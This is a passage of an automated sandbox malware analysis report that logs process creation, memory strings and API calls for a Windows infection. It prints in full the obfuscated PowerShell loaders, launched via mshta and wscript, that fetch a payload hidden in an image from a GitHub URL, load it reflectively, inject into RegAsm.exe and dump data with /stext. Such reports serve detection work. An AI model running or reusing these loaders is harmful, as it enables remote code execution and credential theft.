tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"Jump to behavior
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpc]sP
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3S\
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerjN{
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerz*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434CB6 cpuid 11_2_00434CB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,11_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00451FD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
